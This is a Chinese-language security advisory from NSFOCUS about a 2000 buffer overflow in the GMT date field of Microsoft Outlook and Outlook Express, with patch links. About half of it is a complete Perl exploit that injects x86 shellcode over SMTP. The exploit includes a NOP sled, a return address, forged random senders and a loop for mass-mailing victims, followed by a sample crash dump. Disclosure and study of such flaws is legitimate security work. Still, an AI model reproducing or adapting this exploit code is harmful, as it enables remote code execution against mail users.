NSFOCUS绿盟科技

首页 -> 安全研究

安全研究

安全漏洞

Microsoft Outlook/Outlook Express GMT域缓冲区溢出漏洞

发布日期：2000-07-20
更新日期：2000-07-20

受影响系统：

Microsoft Outlook 97.0
Microsoft Outlook 98
Microsoft Outlook 2000
Microsoft Outlook Express 5.0
Microsoft Outlook Express 4.0.1
Microsoft Outlook Express 4.0
   - Microsoft Windows 98
   - Microsoft Windows 95
   - Microsoft Windows NT 4.0

描述：

Microsoft Outlook 和 Outlook Express的所有版本都存在一个缓冲区溢出问题。远程攻击者可
能在接受邮件的的主机上执行任意代码。这个安全问题出在Outlook对邮件头中GMT(时区)域的处理
部分。这部分工作由INETCOMM.DLL来完成，由于缺乏对GMT域的长度检查，恶意用户可以构造一封
特殊的邮件，在GMT域输入一段很长的字符串，就会导致outlook发生溢出，如果GMT域使用任意数据
填充，将导致outlook崩溃，如果使用可执行代码填充，就可能让outlook/outlook express执行任
意代码。

例如：

Date: Tue, 18 July 2000 14:16:06 +1000<long string of characters>

注意：这个漏洞的严重性在于并不需要用户浏览这封邮件，而是当用户通过POP3或者IMAP4下载邮件
时，溢出就会发生。

<* 来源：USSR Labs <labs@ussrback.com>
Aaron Drew <ripper@hotkey.net.au>
*>

测试方法：

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

通过SMTP server来发送一封测试邮件：

HELO
MAIL FROM: BILLGATES@MICROSOFT.COM
RCPT TO: MY@EMAIL.COM
DATA
Date: Thu,13 Jun 2000 12:33:16
+1111111111111111111111111111111111111111111111111111111111111
(dot here)
QUIT
然后用outlook接受邮件，将发生无效页面错误

    OUTLOOK caused an invalid page fault in
    module <unknown> at 00de:00aedc5a.
    Registers:
    EAX=80004005 CS=016f EIP=00aedc5a EFLGS=00010286
    EBX=70bd4899 SS=0177 ESP=0241ef94 EBP=31313131
    ECX=00000000 DS=0177 ESI=0241efc6 FS=2b57
    EDX=81c0500c ES=0177 EDI=0241efc4 GS=0000
    Bytes at CS:EIP:
    Stack dump:
    0241f360 0241f554 00000000 00000001 00000000 004580d0 00000054 00000054
    0241efc4 0000003b 00000100 00000017 3131312b 31313131 31313131 31313131
USSR labs提供了几个测试程序：
Unix/Linux Perl Version:
http://www.ussrback.com/outoutlook.pl

Windows Console Version:
http://www.ussrback.com/outoutlook.exe

Windows Console Version Source:
http://www.ussrback.com/outoutlook.zip

================ outoutlook.pl =======================
#!/usr/bin/perl
#******************************************************************************
#http://www.ussrback.com Ussr Labs (Exploiteable Buffer Overflow)
# Outlook Express 5.0 | Outlook 2000 | Outlook 97.0 | Outlook 98
#******************************************************************************
#
# By: Ussr Labs
#
# Arbitary shellcode injector over SMTP
# ./$0 -h <server hostname>  -m <mail>
# ./dieoutlook.pl -h <smtp server> -m victim@address.com
#
#
#
#For Multiple email's Spanwn do something like this:
#
# for i in `cat emailshere.txt`; do perl ./outoutlook.pl -h smtpserverip -m $i; done
#
#
#
#

use Getopt::Std;
use Socket;
getopt('h:m', \%args);

# user defined variables
if(defined($args{h})){$serv=$args{h}}else{&usage;}
if(defined($args{m})){$rcpt=$args{m}}else{&usage;}

# These are the escape characters which will cause the seg violation.
# *nix didn't like the ascii interpretation, so we send the
# characters in hex.
# +,1 ,?,^ ,?,z ,?,x

$spawn = "\x2b\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31" .
    "\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31" .
    "\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31" .
    "\x31\x31\x31\x31\x31\x31\x31\x31\x5a\xdc\xae\x20\x78\x0d\x0a";

$shellcode = "\xE8\x00\x00\x00\x00\x5D\x81\xED\x40\x10\x40\x00\x81\xC4\x00" .
    "\x03\x00\x00\xB8\x38\x10\x00\x01\x8B\x00\x89\x85\x0B\x11\x40\x00" .
    "\x8C\xC8\xA8\x04\x75\x08\x8B\x85\x1F\x11\x40\x00\xEB\x06\x8B\x85" .
    "\x23\x11\x40\x00\x89\x85\x1F\x11\x40\x00\x8D\x8D\x42\x11\x40\x00" .
    "\x51\x50\xFF\x95\x0B\x11\x40\x00\x89\x85\x0F\x11\x40\x00\x8D\x8D" .
    "\x53\x11\x40\x00\x51\xFF\x95\x0F\x11\x40\x00\x8D\x8D\x34\x11\x40" .
    "\x00\x51\x50\xFF\x95\x0B\x11\x40\x00\x89\x85\x13\x11\x40\x00\x8B" .
    "\x85\x1F\x11\x40\x00\x8D\x8D\x27\x11\x40\x00\x51\x50\xFF\x95\x0B" .
    "\x11\x40\x00\x89\x85\x17\x11\x40\x00\x8D\x85\x1B\x11\x40\x00\x50" .
    "\x6A\x00\x6A\x00\x8D\x85\xE3\x10\x40\x00\x50\x6A\x00\x6A\x00\x8B" .
    "\x85\x17\x11\x40\x00\xFF\xD0\xEB\xFE\x60\xE8\x00\x00\x00\x00\x5D" .
    "\x81\xED\xE9\x10\x40\x00\x6A\x00\x6A\x00\x6A\x00\x8D\xB5\x5F\x11" .
    "\x40\x00\x56\x6A\x00\x6A\x00\xFF\x95\x13\x11\x40\x00\x61\xC2\x10" .
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" .
    "\x00\x00\x00\x00\x00\x00\x00\xF0\x77\x00\x00\xF7\xBF\x43\x72\x65" .
    "\x61\x74\x65\x54\x68\x72\x65\x61\x64\x00\x53\x68\x65\x6C\x6C\x45" .
    "\x78\x65\x63\x75\x74\x65\x41\x00\x47\x65\x74\x4D\x6F\x64\x75\x6C" .
    "\x65\x48\x61\x6E\x64\x6C\x65\x41\x00\x73\x68\x65\x6C\x6C\x33\x32" .
    "\x2E\x64\x6C\x6C\x00\x77\x77\x77\x2E\x75\x73\x73\x72\x62\x61\x63" .
    "\x6B\x2E\x63\x6F\x6D\x00";

$ret = "00aedc5a";                        # return address
$nop = "\x90";                            # x86 NOP
$port = 25;                            # default 25 SMTP port
$buffsize = "1348";                        # buffer size
$buffer .= $nop x 945;                        # load $buffer with 945 NOP then $shellcode
$buffer .= $shellcode;                        # append shellcode to buffer
$offset = (hex $ret);                        # return hex string to corresponding value
$code = pack("N", $offset);                    # big-endian (long) network order
while (length $buffer < $buffsize) { $buffer .= $code; }
$buffer .= "\n\n";
print "$code\n";

# create random MAIL FROM field. format is: [ alphanumeric ] @ [ characters ] . [ domain ]

$max=(int rand 15);
@a=('a'..'z', '1'..'10'); for (1..$max) { $str .= $a[rand @a] }
@a=('a'..'z'); for (1..$max) { $host .= $a[rand @a] }
@dom = ('.com', '.net', '.org');
$rdom = $dom[ rand @dom ];
$rmail = $str . "@" . $host . $dom;
print "random address set to: $rmail\n";

# random date method, format: Date: <day>, <int-day> <month> 2000 <time>

@days = ('Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat', 'Sun');
$rday = $days[ rand @days ];
$rcal=(int rand(31));
$rhour=(int rand(23)); if ($rhour < 10){ $rhour = "0".$rhour; }
$rmin=(int rand(59)); if ($rmin < 10){ $rmin = "0".$rmin; }
$rsec=(int rand(59)); if ($rsec < 10){ $rsec = "0".$rsec; }
@months = ('Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Oct', 'Sep', 'Nov', 'Dec');
$rmonth = $months[ rand @months ];
$date = "Date: ".$rday.","; if ( $rcal >9 ){$date = $date."$rcal"." $rmonth"." 2000 ".$rhour.":".$rmin.":".$rsec," ";}
else { $date = $date." $rcal"." $rmonth"." 2000 ".$rhour.":".$rmin.":".$rsec," ";}
print "date set to: $date\n";

$in_addr = (gethostbyname($serv))[4] || die("Error: $!\n");
$paddr = sockaddr_in($port, $in_addr) || die ("Error: $!\n");
$proto = getprotobyname('tcp') || die("Error: $!\n");

socket(S, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(S, $paddr) || die("Error: $!\n");
select(S); $| = 1; select(STDOUT);

# begin our SMTP transaction

print "now starting SMTP transaction\n";
$res=<S>; print "$res\n";
print "sending HELO\n";
system("sleep 2s");
print S "HELO\r\n";
$res=<S>; print "$res\n";

print "sending MAIL FROM\n";
system("sleep 2s");
print S "MAIL FROM:$rmail\r\n";
$res=<S>; print "$res\n";

print "sending RCPT\n";
system("sleep 2s");
print S "RCPT TO:$rcpt\r\n";
$res=<S>; print "$res\n";

print "sending DATA\n";
system("sleep 2s");
print S "DATA\r\n";
$res=<S>; print "$res\n";

print "sending escape characters\n";
print S "$date";
print S " $spawn";

print "sending shellcode\n";
print S "$shellcode\r\n\r\n\r\n";
#$res=<S>; print "$res\n";
print S ".\r\n";
print S "QUIT\r\n";

print "shellcode spawn was successful\n";
close(S);

sub usage {die("\n\n./$0 -h <hostname> -m <mail>\n\n");}

建议：

微软已经提供了相应的补丁程序，可以针对不同的版本下载：

- Internet Explorer 5.01 Service Pack 1,
http://www.microsoft.com/Windows/ie/download/ie501sp1.htm
- Internet Explorer 5.5 on any system except Windows 2000,
http://www.microsoft.com/windows/ie/download/ie55.htm

浏览次数：7247
严重程度：0（网友投票）

关于我们: 公司介绍; 公司荣誉; 公司新闻

联系我们: 公司总部; 分支机构; 海外机构

快速链接: 绿盟云; 绿盟威胁情报中心NTI; 技术博客